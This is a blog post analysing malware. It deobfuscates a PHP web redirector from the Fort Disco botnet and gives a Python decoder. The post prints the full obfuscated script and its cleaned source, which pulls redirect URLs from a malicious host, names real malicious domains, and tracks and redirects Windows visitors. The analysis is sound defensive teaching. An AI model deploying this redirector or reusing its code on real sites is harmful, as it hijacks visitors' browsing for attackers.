10 August 2013

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' .'vY' .'2s' .'='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('Z' .'mlsZV9leG' .'lzdH' .'M='),base64_decode('dW5zZX' .'JpYWx' .'pemU='),base64_decode('Z' .'mlsZV9nZXRfY29udGVu' .'dHM='),base64_decode('dGlt' .'ZQ' .'=' .'='),base64_decode('Zm' .'ls' .'Z' .'V9n' .'ZX' .'RfY29' .'ud' .'GVu' .'dHM='),base64_decode('d' .'GltZ' .'Q=='),base64_decode('Zm9w' .'ZW4='),base64_decode('Zmx' .'vY2s='),base64_decode('' .'ZnB1dHM='),base64_decode('c2VyaWFsaX' .'pl'),base64_decode('Zm' .'xvY2s='),base64_decode('ZmNsb' .'3N' .'l'),base64_decode('c' .'3Vic3Ry'),base64_decode('' .'a' .'GVhZGVy'),base64_decode('aGVhZGV' .'y')); ?><? 
function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__) ._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT ._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND $GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0 ._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND $_GET[_1348942592(14)]== _1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)] ._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND $_GET[_1348942592(19)]== _1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)] ._1348942592(22))){echo _1348942592(23);}else{echo 
_1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30) .$GLOBALS['_584730172_'][15](_1348942592(31),$_2) ._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34) .$GLOBALS['_584730172_'][17](_1348942592(35),$_3) ._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)] ._1348942592(39));if($_4 == _1348942592(40)or $_4 == false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)] ._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0 ._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!= _1348942592(57))$_11=_1348942592(58) .$_11 ._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60)); ?>

As a fan of obfuscation, I was immediately interested. The initial question was what all of the Base64 sections contained, but let's examine the script holistically. At a high level, the code block has three distinct sections, each of which begins with "<?".




The "<? $GLOBALS['_584730172_']" section builds an array of PHP function names, each stored as a Base64-encoded string. base64_decode runs on every value as the array is created and returns the actual text, so the array ends up holding plain function names. Hand-picking a few of these to test shows that they all return known PHP function names:
base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n') resolves to "error_reporting"
base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'=') resolves to "set_time_limit"
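
To check a few of these by hand, something like the following works. This is a minimal sketch and not part of the decoder shown later; the helper name decode_split_literal is my own, and it assumes every fragment is a single-quoted literal as in the sample.

```python
import base64
import re


def decode_split_literal(php_expr):
    """Join the quoted fragments of a base64_decode('..' .'..') call and decode them."""
    # Collect every single-quoted fragment, in order of appearance.
    fragments = re.findall(r"'([^']*)'", php_expr)
    return base64.b64decode("".join(fragments)).decode("ascii")


samples = [
    "base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n')",
    "base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'=')",
]

for sample in samples:
    print(decode_split_literal(sample))
```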

The Base64-encoded values are further obfuscated by breaking each string into multiple segments and rejoining them with the PHP concatenation operator ("."). Because many inspection devices may block PHP that contains a call to "preg_match", bad guys will normally Base64 encode such names. But devices can also search for the Base64 values of suspicious calls. To avoid this, the obfuscator (not seen here) randomly breaks the encoded text into chunks that are difficult for an automated device to piece back together.
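
The effect of the chunking can be seen with a short sketch. It assumes a naive scanner that searches the raw file for the Base64 form of "preg_match"; the variable names are illustrative, and the fragment is one of the array entries from the sample.

```python
import base64
import re

# What a simple signature for the encoded function name would look like.
signature = base64.b64encode(b"preg_match").decode("ascii")

# One entry copied from the sample's function table.
raw = "base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA==')"

# Remove the quote-dot-quote joins to undo the chunking.
normalized = re.sub(r"'\s*\.\s*'", "", raw)

print(signature in raw)         # the split form hides the signature
print(signature in normalized)  # the rejoined form exposes it
```

Rejoining the fragments before scanning is enough to defeat this particular trick, which is the same normalization the decoder later in this post performs.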

Knowing that the "$GLOBALS['_584730172_']" resolves function names, we can analyze it in code with context. "$GLOBALS['_584730172_'][0]" will extract the first function name from the array ("error_reporting") and execute it in-place. We know that we need to just replace these calls with their actual Base64 decoded values. This can be done manually, but we'll do it automatically later.

The second section of the code is a function:
<? function _1348942592($i){

This function does the same thing as "$GLOBALS['_584730172_']", but in a different manner. When passed a number, the function finds the corresponding value in an array and Base64 decodes it. Looking through these, we see that they're the string values associated with the code:
'aHR0cDovL2dheWxlZWNoZXIuY29tOjgx' resolves to "http://gayleecher.com:81"
'cXdlMTIz' resolves to "qwe123"
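
The lookup function can be mimicked in a few lines. This sketch copies only the first five entries of the sample's table; the name lookup is my own stand-in for _1348942592.

```python
import base64

# First five entries of the string table from the sample.
encoded = [
    "aHR0cDovL2dheWxlZWNoZXIuY29tOjgx",
    "cXdlMTIz",
    "cXdlMTIz",
    "MTIzcXdl",
    "Uk9PVA==",
]


def lookup(index):
    """Return the decoded string stored at the given table index."""
    return base64.b64decode(encoded[index]).decode("ascii")


for index in range(len(encoded)):
    print(index, lookup(index))
```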

We see these strings substituted within the code as function calls like:
$_0=_1348942592(0);

Just as with the function names, we'll want to replace these calls with their respective strings in the code. 
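
One way to do that substitution is a regular expression with a callback. This is a sketch of an alternative to the split-based approach in the decoder below; inline_string_calls is a hypothetical helper, and it assumes none of the decoded strings contain a single quote, which holds for this sample.

```python
import re


def inline_string_calls(code, strings, func_name="_1348942592"):
    """Replace each func_name(N) call with the N-th string as a PHP literal."""
    pattern = re.compile(re.escape(func_name) + r"\((\d+)\)")

    def to_literal(match):
        # Wrap the decoded value in single quotes so the result stays valid PHP.
        return "'" + strings[int(match.group(1))] + "'"

    return pattern.sub(to_literal, code)


strings = ["http://gayleecher.com:81", "qwe123", "qwe123", "123qwe"]
snippet = (
    "$_0=_1348942592(0);"
    "if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){"
)
print(inline_string_calls(snippet, strings))
```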

And, finally, that leaves us with the actual code itself. By itself, it's not possible to analyze this without the function names and strings. You could manually replace the calls with the appropriate values, but it could also be done automatically. While in a hotel for an incident response, and waiting for my colleagues to prepare for dinner, I whipped up a very ugly decoder in Python. I've taken the time to clean it up a bit, shown below:

import base64
script = """
<<script>>
"""

functions = []
strings = []

# Split the script into its three segments (functions, strings, code).
sections = script.split("<?")
function_section = sections[1]
string_section = sections[2]
code = "<?" + sections[3]

# Parse through each value, separated by base64_decode call.
for entry in function_section.split("base64_decode"):
    # Skip the initial entry as it contains no value.
    if "GLOBALS" in entry:
        continue
    # Remove the string concatenations
    entry = entry.replace("' .'", "")
    # Split on single quote to get the Base64 value contained within the quotes.
    function = entry.split("'")[1]
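    # Append new function name into array. Decode the bytes to text so the
    # replacement below works under both Python 2 and Python 3.
    functions.append(base64.b64decode(function).decode("utf-8"))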

for entry in string_section.split(","):
    entry = entry.split("'")[1]
    strings.append(base64.b64decode(entry).decode("utf-8"))

# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines = code.split("$GLOBALS['_584730172_']")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    # Ensure the index call, [x], is in the string before going on.
    if not "[" in line:
        continue
    # Extract the index number, pull the function from the array.
    codenum = line.split("[")[1].split("]")[0]
    func = functions[int(codenum)]
    # Recreate the array string and replace it in the code.
    s = "$GLOBALS['_584730172_'][%s]" % codenum
    code = code.replace(s, func)

# Now start replacing strings with true values.
code_lines = code.split("_1348942592")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    if not "(" in line:
        continue
    codenum = line.split("(")[1].split(")")[0]
    string = strings[int(codenum)]
    s = "_1348942592(%s)" % codenum
    code = code.replace(s, "'" + string + "'")

# Print the final code.
print(code)


The resulting code has one more slight layer of obfuscation: no line breaks or indentation. This is easily resolved by submitting the code to an online code cleaner, such as PHP Code Cleaner. The result is close to the original source and is much easier to analyze:


<?php 
    error_reporting(round(0));
    set_time_limit(round(0));
    $_0='http://gayleecher.com:81';

    if(isset($_GET['qwe123'])AND $_GET['qwe123']=='123qwe'){
        define('ROOT',dirname(__FILE__) .'/');
        define('LOG',ROOT .'ololo.txt');
        @unlink(LOG);

        if(!file_exists(LOG)){
            @touch(LOG);

            if(is_writable(LOG)AND trim(file_get_contents($_0 .'/iframe.txt'))=='test'){
                @unlink(LOG);
                echo 'work';
            } else {
                echo 'NO WORK, NOT GET URL';
            }
        }
        else{
            echo 'NO WORK, NOT WRITIBLE';
        }
        exit;
    }
    
    if(isset($_GET['aaa'])AND $_GET['aaa']=='aaa'){
        $_1=file_get_contents($_SERVER['SCRIPT_FILENAME'] .'.count');
        echo $_1;
        exit;
    }

    if(isset($_GET['bbb'])AND $_GET['bbb']== 'ccc'){
        if(unlink($_SERVER['SCRIPT_FILENAME'] .'.count')){
            echo 'Null count ok';
        } else {
            echo 'ERROR null count((';
        }
        exit;
    }

    
    if(!empty($_SERVER['HTTP_USER_AGENT'])){
        $_2=array('MSIE','Firefox','Opera');
        $_3=array('Windows');
        
        if(preg_match('/' .implode('|',$_2) .'/i',$_SERVER['HTTP_USER_AGENT'])){
            if(preg_match('/' .implode('|',$_3) .'/i',$_SERVER['HTTP_USER_AGENT'])){
                $_4=@file_get_contents($_SERVER['SCRIPT_FILENAME'] .'.count');
                if($_4 == ''or $_4 == false)$_4=round(0);
                $_5=@fopen($_SERVER['SCRIPT_FILENAME'] .'.count','w');
                @flock($_5,LOCK_EX);
                @fputs($_5,$_4+round(0+1));
                @flock($_5,LOCK_UN);
                @fclose($_5);
                $_6=$_0 .'/iframe2.txt';
                $_7=round(0+300);
                $_8='http://ya.ru/';
                
                if (!$_6) exit();
                $_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last'=>round(0),'url'=>$_8);
                
                if($_9['last']<time()-$_7){
                    if($_9['url']=file_get_contents($_6)){
                        $_9['last']=time();
                        $_10=fopen('settings.json','w');
                        flock($_10,LOCK_EX);
                        fputs($_10,serialize($_9));
                        flock($_10,LOCK_UN);
                        fclose($_10);
                    }
                }
                $_11 = $_9['url'] ? $_9['url'] : $_8;
                if(substr($_11,round(0),round(0+1+1+1+1))!= 'http')$_11='http://' .$_11 .'/';
                header("Location: $_11");
                exit;
            }
        }
    }
    header('HTTP/1.1 404 Not Found');
    ?>
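
If you would rather not paste a sample into an online service, the line breaks and indentation can be roughly restored offline. The following is a naive sketch of my own, not the tool mentioned above: it breaks lines on ";", "{" and "}" outside of quoted strings, and it does not handle escaped quotes, comments, or "for(;;)" headers.

```python
def pretty_print_php(code, indent="    "):
    """Very rough PHP re-indenter: one statement per line, indented by brace depth."""
    lines = []
    depth = 0
    current = ""
    in_string = None  # holds the active quote character while inside a literal

    for ch in code:
        if in_string:
            current += ch
            if ch == in_string:
                in_string = None
        elif ch in "'\"":
            in_string = ch
            current += ch
        elif ch == "{":
            lines.append(indent * depth + (current + "{").strip())
            depth += 1
            current = ""
        elif ch == "}":
            if current.strip():
                lines.append(indent * depth + current.strip())
            depth = max(depth - 1, 0)
            lines.append(indent * depth + "}")
            current = ""
        elif ch == ";":
            lines.append(indent * depth + (current + ";").strip())
            current = ""
        else:
            current += ch

    if current.strip():
        lines.append(indent * depth + current.strip())
    return "\n".join(lines)


print(pretty_print_php("if($a){echo 'x;y';exit;}echo 1;"))
```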

Let's walk through this a bit. The code has multiple paths, depending on various inputs. These inputs are passed along as URI query parameters:

    if(isset($_GET['qwe123'])AND $_GET['qwe123']=='123qwe'){

This line is responsible for checking for a URI field named "qwe123", such as:

http://www.website.com/a.php?qwe123=123qwe

If that field contains the value "123qwe", then this section of code is executed. It acts as a self-test. The code first deletes any existing "ololo.txt" in the same directory as the malicious script (unlink()); if the file still exists afterward, it displays "NO WORK, NOT WRITIBLE" (sic) in the web session. Otherwise, it recreates the file with touch() and checks that it is writable. This file exists solely so the code can determine whether it has write permissions to the folder via the web. It also ensures that it can reach the malicious domain by retrieving hxxp://gayleecher.com:81/iframe.txt and checking that the response, once trimmed, is the text "test". On success it deletes the file again and displays "work"; otherwise it displays "NO WORK, NOT GET URL".

    if(isset($_GET['aaa'])AND $_GET['aaa']=='aaa'){

This line checks for a URI field named "aaa" and ensures it contains the value of "aaa". If so, it takes the script's own file path ($_SERVER['SCRIPT_FILENAME']), appends ".count" to the end of it, and reads that file. For example, a.php would read a.php.count. The contents are then displayed in the web session.

    if(isset($_GET['bbb'])AND $_GET['bbb']== 'ccc'){

This line checks for a URI field named "bbb" and ensures it contains the value of "ccc". If so, it will locate the aforementioned .count file and delete it.
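
The three operator commands above can be summarized as a small dispatch table. This is a model of the control flow only; the function name and the branch labels ("self-test", "read-counter", "reset-counter", "default") are my own, and Python's strict comparison stands in for PHP's looser "==".

```python
def classify_request(params):
    """Return which branch of the script a set of query parameters would reach."""
    if params.get("qwe123") == "123qwe":
        return "self-test"       # write-permission and connectivity check
    if params.get("aaa") == "aaa":
        return "read-counter"    # echo the contents of <script>.count
    if params.get("bbb") == "ccc":
        return "reset-counter"   # delete <script>.count
    return "default"             # fall through to the visitor redirect logic


print(classify_request({"qwe123": "123qwe"}))
print(classify_request({"aaa": "aaa"}))
print(classify_request({"bbb": "ccc"}))
print(classify_request({}))
```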

Lacking any submitted values, the code performs its default routine. This begins by ensuring that the visitor is using a Windows-based machine running Internet Explorer, Firefox, or Opera, based upon the browser's user-agent. The code then updates its ".count" file to increment the counter by one. A request is then made to retrieve the contents of hxxp://gayleecher.com:81/iframe2.txt. This file currently contains:

http://s2s2s2.in/?id=123
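
The visitor filter from the default routine is easy to reproduce when testing which user-agents would be redirected. This sketch mirrors the two preg_match() calls with Python's re module; the function name is_targeted and the user-agent strings in the usage lines are illustrative examples, not values from the sample.

```python
import re

BROWSERS = ["MSIE", "Firefox", "Opera"]
PLATFORMS = ["Windows"]


def is_targeted(user_agent):
    """True when the user-agent matches both the browser and the platform list."""
    if not user_agent:
        return False
    # Equivalent of preg_match('/MSIE|Firefox|Opera/i', ...) and '/Windows/i'.
    browser_ok = re.search("|".join(BROWSERS), user_agent, re.IGNORECASE)
    platform_ok = re.search("|".join(PLATFORMS), user_agent, re.IGNORECASE)
    return bool(browser_ok and platform_ok)


windows_firefox = "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0"
linux_firefox = "Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"
print(is_targeted(windows_firefox))
print(is_targeted(linux_firefox))
```

Any visitor that fails the filter falls through to the final header() call and receives a 404, which helps the script stay hidden from crawlers and non-Windows analysts.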

Afterward is a line that would confuse many who are not familiar with the ternary operator:

$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last'=>round(0),'url'=>$_8);

A ternary operation checks a logical condition to see if it is true or false. If true, it returns one value; if false, another.

result = condition ? result_true : result_false

In this case, does the file "settings.json" exist? If so, then read the contents through unserialize() (which converts serialized data back into PHP values, here an array) and place the resulting array into $_9. If "settings.json" does not exist, then create a new array with a "last" field of 0 and a "url" field that contains $_8 ("http://ya.ru/").
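
For readers more at home in Python, the same decision can be written with a conditional expression. This is a sketch under assumptions: load_settings and read_text are hypothetical helpers, and the parse argument is a stand-in for PHP's unserialize(), which has no direct equivalent in the Python standard library.

```python
import os


def read_text(path):
    """Return the full contents of a text file."""
    with open(path) as handle:
        return handle.read()


def load_settings(path, default_url, parse):
    """Load stored settings if the file exists, otherwise build the defaults."""
    # Python spelling of: result = condition ? result_true : result_false
    return parse(read_text(path)) if os.path.exists(path) else {"last": 0, "url": default_url}


# With no settings file present, the defaults are returned.
print(load_settings("/nonexistent/settings.json", "http://ya.ru/", parse=str))
```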

When the stored value is stale, the "url" field in this array is set to the contents of the iframe2.txt file above, and the "last" field is set to the current date and time as an epoch value. The values are then written back to "settings.json".

Another aspect of this is the time frequency of connections. This can be determined by examining the following lines:
                $_7=round(0+300);
                if($_9['last']<time()-$_7){

This code sets $_7 to 300; the "round(0+" wrapper is cruft that can be ignored. The sample then checks to see if the "last" visit time is less than the current time (as an epoch) minus 300 seconds, or 5 minutes. In essence, if it's been longer than 5 minutes since checking in with iframe2.txt, the sample will check in to acquire the latest URL to connect to.
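
The staleness check boils down to one comparison. A minimal sketch, with needs_refresh and REFRESH_INTERVAL as names of my own choosing:

```python
import time

REFRESH_INTERVAL = 300  # seconds, the value the sample stores in $_7


def needs_refresh(last_fetch, now=None, interval=REFRESH_INTERVAL):
    """Mirror of: $_9['last'] < time() - $_7."""
    if now is None:
        now = time.time()
    return last_fetch < now - interval


# A "last" value of 0 (the default array) always triggers a fetch.
print(needs_refresh(0))
# Fetched 100 seconds ago: the cached URL is reused.
print(needs_refresh(900, now=1000))
```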

Later logic ensures that there is a URL set. If not, it will default to the hardcoded address of "http://ya.ru/". For additional checking, the sample then ensures that the URL begins with the text "http". If not, it prepends "http://" and appends "/" to create a valid URL:

if(substr($_11,round(0),round(0+1+1+1+1))!= 'http')$_11='http://' .$_11 .'/';
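
The fallback and the prefix check translate directly. This is a sketch with a hypothetical function name, choose_redirect; the default mirrors the hardcoded value in $_8.

```python
def choose_redirect(stored_url, default_url="http://ya.ru/"):
    """Pick the redirect target the way the sample does."""
    # $_11 = $_9['url'] ? $_9['url'] : $_8;
    url = stored_url if stored_url else default_url
    # substr($_11, 0, 4) != 'http'
    if url[:4] != "http":
        url = "http://" + url + "/"
    return url


print(choose_redirect(""))
print(choose_redirect("example.test"))
print(choose_redirect("http://s2s2s2.in/?id=123"))
```

Note that the check only looks at the first four characters, so a bare host name that happens to start with "http" would pass through unchanged.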

The point of this entire script comes at the very end:

                header("Location: $_11");

This is a slightly obscure PHP call that adds a raw HTTP header field to the outgoing response. In this case, it adds a "Location: " field, which also causes PHP to send a 302 redirect status, so the client is redirected to a new web site.

So let's sit back and take in what we know.

This is obfuscated PHP code that sits on a web server. When visited by a home user, the code will query gayleecher.com (at most once every five minutes) to retrieve a redirect URL. It saves this to a local file named "settings.json" and then redirects the home user to the same URL. All the while, a counter is being saved in the background that logs how many total home users are redirected. The actor can query this counter, or reset it, by passing certain arguments to the script.

At this time, all users are redirected to:

http://s2s2s2.in/?id=123

I hope this was insightful to anyone learning web attack analysis. I am a big fan of obfuscation, encoding, and encryption and love to tear apart such samples. As I've joked before, this is like Sudoku: a relaxing yet challenging exercise that more people should learn :)

6 comments:

  1. Hi,
    any chance to see here the obfuscator name or source code?
    Thank you very much!

    Replies
    1. Unfortunately, the actual obfuscator isn't known for this. Or, at least, not known to me. All I have to work from is its final result.

    2. Thank you very much Brian.
      I encountered a Web bot obfuscated in that way and I coded a simple deobfuscator to recover more or less the source code.
      I would like to see the obfuscator source code to refine the deobfuscator.
      Thanks anyway.

    3. Hi Brian,
      probably you don't need this information, but I found the obfuscator used here: it's called PHP Obfuscator by DX.
      Have a nice day

    4. Awesome! Yes, thank you, I was very curious where it originated.
